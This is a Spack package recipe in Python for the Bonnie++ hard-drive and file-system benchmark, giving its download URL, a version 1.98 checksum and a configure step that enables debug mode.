# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Bonniepp(AutotoolsPackage):
"""Bonnie++ is a benchmark suite that is aimed at performing a number of
simple tests of hard drive and file system performance."""
homepage = "https://doc.coker.com.au/projects/bonnie"
url = "https://www.coker.com.au/bonnie++/bonnie++-1.98.tgz"
version('1.98', sha256='6e0bcbc08b78856fd998dd7bcb352d4615a99c26c2dc83d5b8345b102bad0b04')
def configure_args(self):
configure_args = []
configure_args.append('--enable-debug')
return configure_args
| lgpl-2.1 | Python |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.